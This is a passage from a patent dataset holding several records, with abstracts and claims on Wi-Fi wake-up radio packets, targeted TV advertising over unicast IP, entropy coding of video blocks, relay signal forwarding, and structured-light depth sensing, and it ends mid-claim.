wherein the packet configured according to the first wireless communication protocol and the low modulation packet configured according to the second wireless communication protocol both have a legacy PHY preamble according to the first wireless communication protocol. 18. The device of claim 17, wherein:
the second wireless communication protocol includes a low-power wake-up receiver (LP-WUR) protocol conforming to Institute for Electronic and Electrical Engineers (IEEE) 802.11 standard; and the first communication protocol includes a standard from an 802.11 standards family of the Institute for Electronic and Electrical Engineers (IEEE), the lowest modulation rate being a Binary Phase Shift Keying (BPSK) modulation rate. 19. The device of claim 17, wherein the logic is further to cause transmission of a neighbor report frame configured according to the first wireless communication protocol or to another wireless communication protocol and including information on a timing for a transmission of the low modulation packet, the information on the timing for the transmission of the low modulation packet including at least one of a target transmission time of the low modulation packet and an interval at which the low modulation packet is to be transmitted. 20. The device of claim 17, wherein the wireless communication device is to be used as part of an access point, and wherein the low modulation packet includes information on an address of the access point. 21. The device of claim 17, further including:
a first radio and first front-end module to carry signals configured according to the first wireless communication protocol; a first baseband processor connected to the first radio and first front-end module; a second radio and second front-end module to carry signals configured according to the second wireless communication protocol; and a second baseband processor connected to the second radio and second front-end module. 22. A product comprising one or more tangible computer-readable non-transitory storage media comprising computer-executable instructions operable to, when executed by at least one computer processor, enable the at least one computer processor to implement operations at a wireless communication device, the operations comprising:
processing a packet configured according to a first wireless communication protocol from a wireless station; causing transmission to the wireless station of a low modulation packet configured according to a second wireless communication protocol, the low modulation packet being at a modulation rate lower than a lowest modulation rate for the first wireless communication protocol; wherein the packet configured according to the first wireless communication protocol and the low modulation packet configured according to the second wireless communication protocol both have a legacy PHY preamble according to the first wireless communication protocol. 23. The product of claim 22, wherein:
the second wireless communication protocol includes a low-power wake-up receiver (LP-WUR) protocol conforming to Institute for Electronic and Electrical Engineers (IEEE) 802.11 standard, and the modulation rate of the low modulation packet is an On-Off Keying (OOK) modulation rate; and the first communication protocol includes a standard from an 802.11 standards family of the Institute for Electronic and Electrical Engineers (IEEE), the lowest modulation rate being a Binary Phase Shift Keying (BPSK) modulation rate. 24. The product of claim 22, wherein the wireless communication device is to be used as part of an access point, and wherein the low modulation packet includes information on an address of the access point. 25. The product of claim 22, wherein the packet configured according to the first wireless communication protocol is a neighbor report frame from the serving access point, the neighbor report frame including information on a timing for a transmission of the low modulation packet from the candidate access point to allow the logic to associate an RSSI value with the address of the candidate access point. | 2,400 |
9,128 | 9,128 | 14,098,511 | 2,421 | Methods and apparatus relating to the supply of targeted advertisements to user devices receiving broadcast or multicast content are described. The methods and apparatus are well suited for systems where content is broadcast or multicast to a plurality of user playback devices, e.g., set top boxes, with advertisements included in the content delivered via a first communications channel, e.g., a broadcast communications channel. Viewing information, e.g., information indicating the tuning of a customer premise device to a channel and/or the outputting of program content is reported to a headend or other device. One or more targeted advertisements are delivered to a customer premise device via a secondary channel, e.g., unicast IP packet channel, with the alternative advertisement being displayed in place of the broadcast advertisement. | 1. A method of operating a customer premise device, the method comprising:
outputting program content received on a first communications channel, said first communications channel being a broadcast channel or a multicast digital video channel; communicating viewing information to a device used to control transmission of advertising content via a second communications channel, said second communications channel being different from said first communications channel; and outputting, during a commercial break which occurs on said broadcast channel or multicast digital video channel, advertising content communicated via said second communications channel. 2. The method of claim 1, wherein said advertising content is communicated via a unicast Internet Protocol (IP) packet stream over said second communications channel. 3. The method of claim 1, further comprising:
monitoring said program content received on said first channel to detect an indicator of an upcoming commercial break; and sending said viewing information to said device after detecting said indicator of an upcoming commercial break. 4. The method of claim 3, wherein monitoring said program content received on said first channel to detect an indicator of an upcoming commercial break includes monitoring for indicators/identifiers indicating the start and the end or duration of the upcoming commercial break. 5. The method of claim 1, wherein said viewing information includes information identifying the program content being output by said customer device. 6. The method of claim 5, wherein said viewing information further includes information indicating the current position within said program content which is being output. 7. The method of claim 6, further comprising:
transmitting user information from said customer premise device to said device, said user information including at least some user profile information. 8. The method of claim 5, further comprising:
receiving said advertising content from a video on demand server; and switching, during said commercial break, said customer premise device from outputting content received on said first communications channel to outputting content communicated via said second communications channel. 9. The method of claim 8, wherein at least some of the content output during said commercial break is received during said commercial break. 10. A customer device, comprising:
an output control module configured to output program content received on a first communications channel, said first communications channel being a broadcast channel or a multicast digital video channel; a communications module configured to communicate viewing information to a device used to control transmission of advertising content via a second communications channel, said second communications channel being different from said first communications channel; and wherein said output control module is further configured to output, during a commercial break which occurs on said broadcast channel or multicast digital video channel, advertising content communicated via said second communications channel. 11. The customer device of claim 10, wherein said advertising content is communicated via a unicast Internet Protocol (IP) packet stream over said second communications channel. 12. The customer device of claim 11, further comprising:
a commercial break detection module configured to monitor said program content received on said first channel to detect an indicator of an upcoming commercial break; and wherein said communications module is configured to communicate said viewing information to said device after detecting said indicator of an upcoming commercial break. 13. The customer device of claim 12, wherein said commercial break detection module is configured to monitor for indicators/identifiers indicating the start and the end or duration of the upcoming commercial break, as part of being configured to monitor the program content received on said first channel to detect an indicator of an upcoming commercial break includes. 14. The customer device of claim 10, wherein said viewing information includes information identifying the program content being output by said customer device. 15. The customer device of claim 14, wherein said viewing information further includes information indicating the current position within said program content which is being output. 16. A method of providing advertising content to a playback device, the method comprising:
receiving, at a control device, a tuning message including tuning information from a customer premise device indicating a broadcast channel to which the customer premise device is tuned and information identifying the customer premise device; determining when advertisement segments occur within the broadcast content on the indicated broadcast channel to which the customer premise device has tuned; and transmitting alternative advertisement content via unicast transmissions directed to said customer premise device to be output by said customer premise device in place of advertising content, corresponding to one or more broadcast advertisement segments, received by said customer premise device via said broadcast channel. 17. The method of claim 16, further comprising:
identifying a customer associated with said customer premise device; and selecting said alternative advertisement content based on customer information about said customer which is used for advertisement targeting purposes. 18. The method of claim 16, wherein transmitting alternative advertisement content via unicast transmissions includes transmitting a unicast IP packet stream including unicast IP packets including a destination IP address corresponding to a device located at a customer premise where said customer premise device is located. 19. The method of claim 18, wherein said device located at the customer premise is one of a gateway device or said customer premise device. 20. The method of claim 19,
wherein said device located at the customer premise is said gateway device, the method further comprising: operating the gateway device to transcode or transrate advertising content included in the unicast IP packets included in said unicast IP packet stream; and operating the gateway device to transmit said transcoded or transrated advertising content to said customer premise device via a home network; monitoring, at the control device, for additional messages relating to said customer premise device; and transmitting, from the control device, alternative advertisement content via unicast IP packets for the advertisement segments of a program being broadcast at the time said tuning message is received absent receipt of a message indicating tuning to a different broadcast channel or powering off of a tuner of said customer premise device. | Methods and apparatus relating to the supply of targeted advertisements to user devices receiving broadcast or multicast content are described. The methods and apparatus are well suited for systems where content is broadcast or multicast to a plurality of user playback devices, e.g., set top boxes, with advertisements included in the content delivered via a first communications channel, e.g., a broadcast communications channel. Viewing information, e.g., information indicating the tuning of a customer premise device to a channel and/or the outputting of program content is reported to a headend or other device. One or more targeted advertisements are delivered to a customer premise device via a secondary channel, e.g., unicast IP packet channel, with the alternative advertisement being displayed in place of the broadcast advertisement.1. A method of operating a customer premise device, the method comprising:
outputting program content received on a first communications channel, said first communications channel being a broadcast channel or a multicast digital video channel; communicating viewing information to a device used to control transmission of advertising content via a second communications channel, said second communications channel being different from said first communications channel; and outputting, during a commercial break which occurs on said broadcast channel or multicast digital video channel, advertising content communicated via said second communications channel. 2. The method of claim 1, wherein said advertising content is communicated via a unicast Internet Protocol (IP) packet stream over said second communications channel. 3. The method of claim 1, further comprising:
monitoring said program content received on said first channel to detect an indicator of an upcoming commercial break; and sending said viewing information to said device after detecting said indicator of an upcoming commercial break. 4. The method of claim 3, wherein monitoring said program content received on said first channel to detect an indicator of an upcoming commercial break includes monitoring for indicators/identifiers indicating the start and the end or duration of the upcoming commercial break. 5. The method of claim 1, wherein said viewing information includes information identifying the program content being output by said customer device. 6. The method of claim 5, wherein said viewing information further includes information indicating the current position within said program content which is being output. 7. The method of claim 6, further comprising:
transmitting user information from said customer premise device to said device, said user information including at least some user profile information. 8. The method of claim 5, further comprising:
receiving said advertising content from a video on demand server; and switching, during said commercial break, said customer premise device from outputting content received on said first communications channel to outputting content communicated via said second communications channel. 9. The method of claim 8, wherein at least some of the content output during said commercial break is received during said commercial break. 10. A customer device, comprising:
an output control module configured to output program content received on a first communications channel, said first communications channel being a broadcast channel or a multicast digital video channel; a communications module configured to communicate viewing information to a device used to control transmission of advertising content via a second communications channel, said second communications channel being different from said first communications channel; and wherein said output control module is further configured to output, during a commercial break which occurs on said broadcast channel or multicast digital video channel, advertising content communicated via said second communications channel. 11. The customer device of claim 10, wherein said advertising content is communicated via a unicast Internet Protocol (IP) packet stream over said second communications channel. 12. The customer device of claim 11, further comprising:
a commercial break detection module configured to monitor said program content received on said first channel to detect an indicator of an upcoming commercial break; and wherein said communications module is configured to communicate said viewing information to said device after detecting said indicator of an upcoming commercial break. 13. The customer device of claim 12, wherein said commercial break detection module is configured to monitor for indicators/identifiers indicating the start and the end or duration of the upcoming commercial break, as part of being configured to monitor the program content received on said first channel to detect an indicator of an upcoming commercial break includes. 14. The customer device of claim 10, wherein said viewing information includes information identifying the program content being output by said customer device. 15. The customer device of claim 14, wherein said viewing information further includes information indicating the current position within said program content which is being output. 16. A method of providing advertising content to a playback device, the method comprising:
receiving, at a control device, a tuning message including tuning information from a customer premise device indicating a broadcast channel to which the customer premise device is tuned and information identifying the customer premise device; determining when advertisement segments occur within the broadcast content on the indicated broadcast channel to which the customer premise device has tuned; and transmitting alternative advertisement content via unicast transmissions directed to said customer premise device to be output by said customer premise device in place of advertising content, corresponding to one or more broadcast advertisement segments, received by said customer premise device via said broadcast channel. 17. The method of claim 16, further comprising:
identifying a customer associated with said customer premise device; and selecting said alternative advertisement content based on customer information about said customer which is used for advertisement targeting purposes. 18. The method of claim 16, wherein transmitting alternative advertisement content via unicast transmissions includes transmitting a unicast IP packet stream including unicast IP packets including a destination IP address corresponding to a device located at a customer premise where said customer premise device is located. 19. The method of claim 18, wherein said device located at the customer premise is one of a gateway device or said customer premise device. 20. The method of claim 19,
wherein said device located at the customer premise is said gateway device, the method further comprising: operating the gateway device to transcode or transrate advertising content included in the unicast IP packets included in said unicast IP packet stream; and operating the gateway device to transmit said transcoded or transrated advertising content to said customer premise device via a home network; monitoring, at the control device, for additional messages relating to said customer premise device; and transmitting, from the control device, alternative advertisement content via unicast IP packets for the advertisement segments of a program being broadcast at the time said tuning message is received absent receipt of a message indicating tuning to a different broadcast channel or powering off of a tuner of said customer premise device. | 2,400 |
9,129 | 9,129 | 15,668,745 | 2,485 | Systems and methods are disclosed for entropy coding of blocks of image data. For example, methods may include partitioning a block of video data into a plurality of groups of elements; decoding, using an entropy decoder, data from an encoded bitstream to obtain elements of a first group from the plurality of groups of elements; determining a category based on the elements of the first group; based on the category, selecting a context for an element from a second group from the plurality of groups of elements; and decoding, using the entropy decoder using the context, data from the encoded bitstream to obtain the element of the second group from the plurality of groups of elements. | 1. A system for decoding video, comprising:
a memory; and a processor, wherein the memory stores instructions executable by the processor to cause the system to:
partition a block of video data into a plurality of groups of elements;
decode, using an entropy decoder, data from an encoded bitstream to obtain elements of a first group from the plurality of groups of elements;
determine a category based on the elements of the first group;
based on the category, select a context for an element from a second group from the plurality of groups of elements; and
decode, using the entropy decoder using the context, data from the encoded bitstream to obtain the element of the second group from the plurality of groups of elements. 2. The system of claim 1, wherein the elements of the block are quantized transform coefficients. 3. The system of claim 1, wherein the first group includes elements of a first row of the block and elements of a first column of the block. 4. The system of claim 1, wherein the first group includes elements forming a triangle in a corner of the block, and wherein the triangle includes elements of a first row of the block and elements of a first column of the block. 5. The system of claim 4, wherein the first group includes elements of a first row of the block that are outside of the triangle and elements of a first column of the block that are outside of the triangle. 6. The system of claim 1, wherein the second group includes all remaining elements of the block outside of the first group. 7. The system of claim 1, wherein the memory stores instructions executable by the processor to cause the system to:
determine, based on the category, a scan order for the second group from the plurality of groups of elements; and decode, using the entropy decoder, data from the encoded bitstream to obtain, using the scan order, elements of the second group from the plurality of groups of elements. 8. The system of claim 1, wherein the category is one of horizontal, vertical, diagonal-left, and diagonal-right. 9. The system of claim 1, wherein the instructions for determining the category based on the elements of the first group include instructions executable by the processor to cause the system to:
determine a first count of non-zero elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determine a second count of non-zero elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determine the category based on the first count and the second count. 10. The system of claim 1, wherein the instructions for determining the category based on the elements of the first group include instructions executable by the processor to cause the system to:
determine a first sum of magnitudes of elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determine a second sum of magnitudes of elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determine the category based on the first sum and the second sum. 11. The system of claim 1, wherein the instructions for determining the category based on the elements of the first group include instructions executable by the processor to cause the system to:
determine a first count of non-zero elements in a portion of a first row of the block; determine a second count of non-zero elements in a portion of a first column of the block; and responsive to the first count being zero and the second count being positive, determine the category to be a value corresponding to a vertical scan order. 12. The system of claim 1, wherein the instructions for determining the category based on the elements of the first group include instructions executable by the processor to cause the system to:
determine a first sum of magnitudes of elements in a portion of a first row of the block; determine a second sum of magnitudes of elements in a portion of a first column of the block; and responsive to the first sum being positive and the second sum being zero, determine the category to be a value corresponding to a horizontal scan order. 13. The system of claim 1, wherein the elements of the block each represent a sub-block of quantized transform coefficients. 14. A method for decoding video comprising:
partitioning a block of video data into a plurality of groups of elements; decoding, using an entropy decoder, data from an encoded bitstream to obtain elements of a first group from the plurality of groups of elements; determining a category based on the elements of the first group; based on the category, selecting a context for an element from a second group from the plurality of groups of elements; and decoding, using the entropy decoder using the context, data from the encoded bitstream to obtain the element of the second group from the plurality of groups of elements. 15. The method of claim 14, wherein the elements of the block are quantized transform coefficients, and further comprising:
displaying video that is generated based in part on decoded elements of the block. 16. A system for encoding video, comprising:
a memory; and a processor, wherein the memory stores instructions executable by the processor to cause the system to:
partition a block of video data into a plurality of groups of elements;
encode, using an entropy encoder, elements of a first group from the plurality of groups of elements;
determine a category based on the elements of the first group;
based on the category, select a context for an element from a second group from the plurality of groups of elements; and
encode, using the entropy encoder using the context, the element of the second group from the plurality of groups of elements. 17. The system of claim 16, wherein the elements of the block are quantized transform coefficients. 18. The system of claim 16, wherein the first group includes elements of a first row of the block and elements of a first column of the block. 19. The system of claim 16, wherein the first group includes elements forming a triangle in a corner of the block, and wherein the triangle includes elements of a first row of the block and elements of a first column of the block. 20. The system of claim 19, wherein the first group includes elements of a first row of the block that are outside of the triangle and elements of a first column of the block that are outside of the triangle. 21. The system of claim 16, wherein the second group includes all remaining elements of the block outside of the first group. 22. The system of claim 16, wherein the memory stores instructions executable by the processor to cause the system to:
determine, based on the category, a scan order for the second group from the plurality of groups of elements; and encode, using the entropy encoder using the scan order, elements of the second group from the plurality of groups of elements. | Systems and methods are disclosed for entropy coding of blocks of image data. For example, methods may include partitioning a block of video data into a plurality of groups of elements; decoding, using an entropy decoder, data from an encoded bitstream to obtain elements of a first group from the plurality of groups of elements; determining a category based on the elements of the first group; based on the category, selecting a context for an element from a second group from the plurality of groups of elements; and decoding, using the entropy decoder using the context, data from the encoded bitstream to obtain the element of the second group from the plurality of groups of elements.1. A system for decoding video, comprising:
a memory; and a processor, wherein the memory stores instructions executable by the processor to cause the system to:
partition a block of video data into a plurality of groups of elements;
decode, using an entropy decoder, data from an encoded bitstream to obtain elements of a first group from the plurality of groups of elements;
determine a category based on the elements of the first group;
based on the category, select a context for an element from a second group from the plurality of groups of elements; and
decode, using the entropy decoder using the context, data from the encoded bitstream to obtain the element of the second group from the plurality of groups of elements. 2. The system of claim 1, wherein the elements of the block are quantized transform coefficients. 3. The system of claim 1, wherein the first group includes elements of a first row of the block and elements of a first column of the block. 4. The system of claim 1, wherein the first group includes elements forming a triangle in a corner of the block, and wherein the triangle includes elements of a first row of the block and elements of a first column of the block. 5. The system of claim 4, wherein the first group includes elements of a first row of the block that are outside of the triangle and elements of a first column of the block that are outside of the triangle. 6. The system of claim 1, wherein the second group includes all remaining elements of the block outside of the first group. 7. The system of claim 1, wherein the memory stores instructions executable by the processor to cause the system to:
determine, based on the category, a scan order for the second group from the plurality of groups of elements; and decode, using the entropy decoder, data from the encoded bitstream to obtain, using the scan order, elements of the second group from the plurality of groups of elements. 8. The system of claim 1, wherein the category is one of horizontal, vertical, diagonal-left, and diagonal-right. 9. The system of claim 1, wherein the instructions for determining the category based on the elements of the first group include instructions executable by the processor to cause the system to:
determine a first count of non-zero elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determine a second count of non-zero elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determine the category based on the first count and the second count. 10. The system of claim 1, wherein the instructions for determining the category based on the elements of the first group include instructions executable by the processor to cause the system to:
determine a first sum of magnitudes of elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determine a second sum of magnitudes of elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determine the category based on the first sum and the second sum. 11. The system of claim 1, wherein the instructions for determining the category based on the elements of the first group include instructions executable by the processor to cause the system to:
determine a first count of non-zero elements in a portion of a first row of the block; determine a second count of non-zero elements in a portion of a first column of the block; and responsive to the first count being zero and the second count being positive, determine the category to be a value corresponding to a vertical scan order. 12. The system of claim 1, wherein the instructions for determining the category based on the elements of the first group include instructions executable by the processor to cause the system to:
determine a first sum of magnitudes of elements in a portion of a first row of the block; determine a second sum of magnitudes of elements in a portion of a first column of the block; and responsive to the first sum being positive and the second sum being zero, determine the category to be a value corresponding to a horizontal scan order. 13. The system of claim 1, wherein the elements of the block each represent a sub-block of quantized transform coefficients. 14. A method for decoding video comprising:
partitioning a block of video data into a plurality of groups of elements; decoding, using an entropy decoder, data from an encoded bitstream to obtain elements of a first group from the plurality of groups of elements; determining a category based on the elements of the first group; based on the category, selecting a context for an element from a second group from the plurality of groups of elements; and decoding, using the entropy decoder using the context, data from the encoded bitstream to obtain the element of the second group from the plurality of groups of elements. 15. The method of claim 14, wherein the elements of the block are quantized transform coefficients, and further comprising:
displaying video that is generated based in part on decoded elements of the block. 16. A system for encoding video, comprising:
a memory; and a processor, wherein the memory stores instructions executable by the processor to cause the system to:
partition a block of video data into a plurality of groups of elements;
encode, using an entropy encoder, elements of a first group from the plurality of groups of elements;
determine a category based on the elements of the first group;
based on the category, select a context for an element from a second group from the plurality of groups of elements; and
encode, using the entropy encoder using the context, the element of the second group from the plurality of groups of elements. 17. The system of claim 16, wherein the elements of the block are quantized transform coefficients. 18. The system of claim 16, wherein the first group includes elements of a first row of the block and elements of a first column of the block. 19. The system of claim 16, wherein the first group includes elements forming a triangle in a corner of the block, and wherein the triangle includes elements of a first row of the block and elements of a first column of the block. 20. The system of claim 19, wherein the first group includes elements of a first row of the block that are outside of the triangle and elements of a first column of the block that are outside of the triangle. 21. The system of claim 16, wherein the second group includes all remaining elements of the block outside of the first group. 22. The system of claim 16, wherein the memory stores instructions executable by the processor to cause the system to:
determine, based on the category, a scan order for the second group from the plurality of groups of elements; and encode, using the entropy encoder using the scan order, elements of the second group from the plurality of groups of elements. | 2,400 |
9,130 | 9,130 | 16,079,275 | 2,465 | An origination device transmits a “received data signal” to a signal forwarding device. The “received data signal” comprises a first set of data. The origination device also transmits at least one “received control signal” to the signal forwarding device and to a destination device. The at least one “received control signal” comprises a first set of control information and a second set of control information. The first and second sets of control information are both associated with the first set of data. The first set of control information contains instructions pertaining to the signal forwarding device processing the first set of data. The second set of control information contains instructions pertaining to the destination device processing the first set of data. The signal forwarding device transmits a “forwarded signal” to the destination device. The “forwarded signal” contains forwarded data, based on the first set of data. | 1. A method comprising:
receiving, at a signal forwarding device, at least one received data signal comprising a first set of data; receiving, at the signal forwarding device and at a destination device, at least one received control signal comprising a first set of control information and a second set of control information, the first set of control information associated with the first set of data and comprising instructions pertaining to the signal forwarding device processing the first set of data, the second set of control information associated with the first set of data and comprising instructions pertaining to the destination device processing the first set of data; and transmitting, from the signal forwarding device, a forwarded signal to the destination device, the forwarded signal comprising forwarded data, based at least partially on the first set of data. 2. The method of claim 1, wherein the at least one received control signal comprises one received control signal that comprises the first set of control information and the second set of control information. 3. The method of claim 1, wherein the at least one received control signal comprises a plurality of received control signals, the plurality of received control signals collectively comprising the first set of control information and the second set of control information. 4. The method of claim 1, further comprising:
providing, to the destination device, an expected time delay between reception of the at least one received control signal at the destination device and reception of the forwarded signal at the destination device. 5. The method of claim 1, wherein the first set of control information is transmitted using a first spatial vector, and the second set of control information is transmitted using a second spatial vector. 6. The method of claim 1, wherein the first set of control information is encoded at a first coding rate, and the second set of control information is encoded at a second coding rate. 7. The method of claim 1, wherein the first set of control information is modulated according to a first modulation technique, and the second set of control information is modulated according to a second modulation technique. 8. The method of claim 1, wherein the first set of control information comprises at least one of the following: carrier frequency, resource allocation, modulation/coding rate, multiple input multiple output (MIMO) scheme details, hybrid automatic repeat request (HARQ) related information, and origination and/or destination identifiers. 9. The method of claim 1, wherein the second set of control information comprises at least one of the following: carrier frequency, resource allocation, modulation/coding rate, multiple input multiple output (MIMO) scheme details, hybrid automatic repeat request (HARQ) related information, and origination and/or destination identifiers. 10. The method of claim 1, further comprising:
assigning at least one of: an association sequence number and an n-bit Downlink Control Information (DCI) indicator to identify which particular at least one received control signal corresponds to which particular forwarded signal. 11. A system comprising:
an origination device comprising a transmitter configured to transmit at least one received data signal comprising a first set of data; and a signal forwarding device comprising:
a receiver configured to receive the at least one received data signal, and
a transmitter configured to transmit a forwarded signal to a destination device, the forwarded signal comprising forwarded data, based at least partially on the first set of data,
the transmitter of the origination device further configured to transmit, to the signal forwarding device and to the destination device, at least one received control signal comprising a first set of control information and a second set of control information, the first set of control information associated with the first set of data and comprising instructions pertaining to the signal forwarding device processing the first set of data, the second set of control information associated with the first set of data and comprising instructions pertaining to the destination device processing the first set of data. 12. The system of claim 11, wherein the at least one received control signal comprises one received control signal that comprises the first set of control information and the second set of control information. 13. The system of claim 11, wherein the at least one received control signal comprises a plurality of received control signals, the plurality of received control signals collectively comprising the first set of control information and the second set of control information. 14. The system of claim 11, where the destination device further comprises a controller configured to determine an expected time delay between reception of the at least one received control signal at the destination device and reception of the forwarded signal at the destination device. 15. The system of claim 11, wherein the first set of control information is transmitted using a first spatial vector, and the second set of control information is transmitted using a second spatial vector. 16. The system of claim 11, wherein the first set of control information is encoded at a first coding rate, and the second set of control information is encoded at a second coding rate. 17. The system of claim 11, wherein the first set of control information is modulated according to a first modulation technique, and the second set of control information is modulated according to a second modulation technique. 18. The system of claim 11, wherein the first set of control information comprises at least one of the following: carrier frequency, resource allocation, modulation/coding rate, multiple input multiple output (MIMO) scheme details, hybrid automatic repeat request (HARQ) related information, and origination and/or destination identifiers. 19. The system of claim 11, wherein the second set of control information comprises at least one of the following: carrier frequency, resource allocation, modulation/coding rate, multiple input multiple output (MIMO) scheme details, hybrid automatic repeat request (HARQ) related information, and origination and/or destination identifiers. 20. The system of claim 11, wherein the origination device further comprises a controller configured to assign at least one of: an association sequence number and an n-bit Downlink Control Information (DCI) indicator to a particular at least one received control signal, the transmitter of the origination device further configured to transmit the assigned at least one of: an association sequence number and an n-bit DCI indicator to the signal forwarding device and to the destination device, the transmitter of the signal forwarding device further configured to include the assigned at least one of: an association sequence number and an n-bit DCI indicator in the forwarded signal. | An origination device transmits a “received data signal” to a signal forwarding device. The “received data signal” comprises a first set of data. The origination device also transmits at least one “received control signal” to the signal forwarding device and to a destination device. The at least one “received control signal” comprises a first set of control information and a second set of control information. The first and second sets of control information are both associated with the first set of data. The first set of control information contains instructions pertaining to the signal forwarding device processing the first set of data. The second set of control information contains instructions pertaining to the destination device processing the first set of data. The signal forwarding device transmits a “forwarded signal” to the destination device. The “forwarded signal” contains forwarded data, based on the first set of data.1. A method comprising:
receiving, at a signal forwarding device, at least one received data signal comprising a first set of data; receiving, at the signal forwarding device and at a destination device, at least one received control signal comprising a first set of control information and a second set of control information, the first set of control information associated with the first set of data and comprising instructions pertaining to the signal forwarding device processing the first set of data, the second set of control information associated with the first set of data and comprising instructions pertaining to the destination device processing the first set of data; and transmitting, from the signal forwarding device, a forwarded signal to the destination device, the forwarded signal comprising forwarded data, based at least partially on the first set of data. 2. The method of claim 1, wherein the at least one received control signal comprises one received control signal that comprises the first set of control information and the second set of control information. 3. The method of claim 1, wherein the at least one received control signal comprises a plurality of received control signals, the plurality of received control signals collectively comprising the first set of control information and the second set of control information. 4. The method of claim 1, further comprising:
providing, to the destination device, an expected time delay between reception of the at least one received control signal at the destination device and reception of the forwarded signal at the destination device. 5. The method of claim 1, wherein the first set of control information is transmitted using a first spatial vector, and the second set of control information is transmitted using a second spatial vector. 6. The method of claim 1, wherein the first set of control information is encoded at a first coding rate, and the second set of control information is encoded at a second coding rate. 7. The method of claim 1, wherein the first set of control information is modulated according to a first modulation technique, and the second set of control information is modulated according to a second modulation technique. 8. The method of claim 1, wherein the first set of control information comprises at least one of the following: carrier frequency, resource allocation, modulation/coding rate, multiple input multiple output (MIMO) scheme details, hybrid automatic repeat request (HARQ) related information, and origination and/or destination identifiers. 9. The method of claim 1, wherein the second set of control information comprises at least one of the following: carrier frequency, resource allocation, modulation/coding rate, multiple input multiple output (MIMO) scheme details, hybrid automatic repeat request (HARQ) related information, and origination and/or destination identifiers. 10. The method of claim 1, further comprising:
assigning at least one of: an association sequence number and an n-bit Downlink Control Information (DCI) indicator to identify which particular at least one received control signal corresponds to which particular forwarded signal. 11. A system comprising:
an origination device comprising a transmitter configured to transmit at least one received data signal comprising a first set of data; and a signal forwarding device comprising:
a receiver configured to receive the at least one received data signal, and
a transmitter configured to transmit a forwarded signal to a destination device, the forwarded signal comprising forwarded data, based at least partially on the first set of data,
the transmitter of the origination device further configured to transmit, to the signal forwarding device and to the destination device, at least one received control signal comprising a first set of control information and a second set of control information, the first set of control information associated with the first set of data and comprising instructions pertaining to the signal forwarding device processing the first set of data, the second set of control information associated with the first set of data and comprising instructions pertaining to the destination device processing the first set of data. 12. The system of claim 11, wherein the at least one received control signal comprises one received control signal that comprises the first set of control information and the second set of control information. 13. The system of claim 11, wherein the at least one received control signal comprises a plurality of received control signals, the plurality of received control signals collectively comprising the first set of control information and the second set of control information. 14. The system of claim 11, where the destination device further comprises a controller configured to determine an expected time delay between reception of the at least one received control signal at the destination device and reception of the forwarded signal at the destination device. 15. The system of claim 11, wherein the first set of control information is transmitted using a first spatial vector, and the second set of control information is transmitted using a second spatial vector. 16. The system of claim 11, wherein the first set of control information is encoded at a first coding rate, and the second set of control information is encoded at a second coding rate. 17. The system of claim 11, wherein the first set of control information is modulated according to a first modulation technique, and the second set of control information is modulated according to a second modulation technique. 18. The system of claim 11, wherein the first set of control information comprises at least one of the following: carrier frequency, resource allocation, modulation/coding rate, multiple input multiple output (MIMO) scheme details, hybrid automatic repeat request (HARQ) related information, and origination and/or destination identifiers. 19. The system of claim 11, wherein the second set of control information comprises at least one of the following: carrier frequency, resource allocation, modulation/coding rate, multiple input multiple output (MIMO) scheme details, hybrid automatic repeat request (HARQ) related information, and origination and/or destination identifiers. 20. The system of claim 11, wherein the origination device further comprises a controller configured to assign at least one of: an association sequence number and an n-bit Downlink Control Information (DCI) indicator to a particular at least one received control signal, the transmitter of the origination device further configured to transmit the assigned at least one of: an association sequence number and an n-bit DCI indicator to the signal forwarding device and to the destination device, the transmitter of the signal forwarding device further configured to include the assigned at least one of: an association sequence number and an n-bit DCI indicator in the forwarded signal. | 2,400 |
9,131 | 9,131 | 13,723,891 | 2,482 | A method and device is provided that compensates for different reflectivity/absorption coefficients of objects in a scene/object when performing active depth sensing using structured light. A receiver sensor captures an image of a scene onto which a code mask is projected. One or more parameters are ascertained from the captured image. Then a light source power for a projecting light source is dynamically adjusted according to the one or more parameters to improve decoding of the code mask in a subsequently captured image. Depth information for the scene may then be ascertained based on the captured image based on the code mask. In one example, the light source power is fixed at a particular illumination while an exposure time for the receiver sensor is adjusted. In another example, an exposure time for the receiver sensor is maintained/kept at a fixed value while the light source power is adjusted. | 1. A device adapted to compensate for differences in surface reflectivity in an active depth sensing system using structured light, comprising:
a receiver sensor for capturing an image of a scene onto which a code mask is projected; a processing circuit adapted to:
ascertain one or more parameters from the captured image; and
dynamically adjust a light source power for a projecting light source according to the one or more parameters to improve decoding of the code mask in a subsequently captured image. 2. The device of claim 1, wherein the processing circuit is further adapted to:
ascertain depth information for the scene in the captured image based on the code mask. 3. The device of claim 1, wherein the processing circuit is further adapted to:
fix the light source power at a particular illumination while an exposure time for the receiver sensor is adjusted. 4. The device of claim 1, wherein the processing circuit is further adapted to:
maintain an exposure time for the receiver sensor at a fixed value while the light source power is adjusted. 5. The device of claim 1, wherein the one or more parameters are correlated to regions within the captured image based on the code mask. 6. The device of claim 1, wherein the projecting light source includes a plurality of light elements, and dynamically adjusting the light source power for the projecting light source includes individually controlling the light source power for each of the light elements based on the corresponding one or more parameters. 7. The device of claim 6, wherein the receiver sensor is further adapted to:
capture a new image of the scene onto which the code mask is projected, wherein the new image is light compensated on a region-by-region basis due to the operation of the individually adjusted plurality of light elements. 8. The device of claim 1, wherein the receiver sensor includes a plurality of individually controlled sensor shutters, and the processing circuit is further adapted to individually control the plurality sensor shutters based on the corresponding one or more parameters to adjust the light captured by the receiver sensor. 9. The device of claim 8, wherein the sensor shutters are controlled to either reduce or increase the light that passes through them to compensate for too much or too little light in a given region as indicated by the one or more parameters. 10. The device of claim 8, wherein the receiver sensor is further adapted to:
capture a new image of the scene onto which the code mask is projected, wherein the new image is light compensated on a region-by-region basis due to the operation of the individually adjusted plurality of sensor shutters. 11. A method to compensate for differences in surface reflectivity in an active depth sensing system using structured light, comprising:
capturing, at a receiver sensor, an image of a scene onto which a code mask is projected; ascertaining, at a processing circuit, one or more parameters from the captured image; and dynamically adjusting a light source power for a projecting light source according to the one or more parameters to improve decoding of the code mask in a subsequently captured image. 12. The method of claim 11, further comprising:
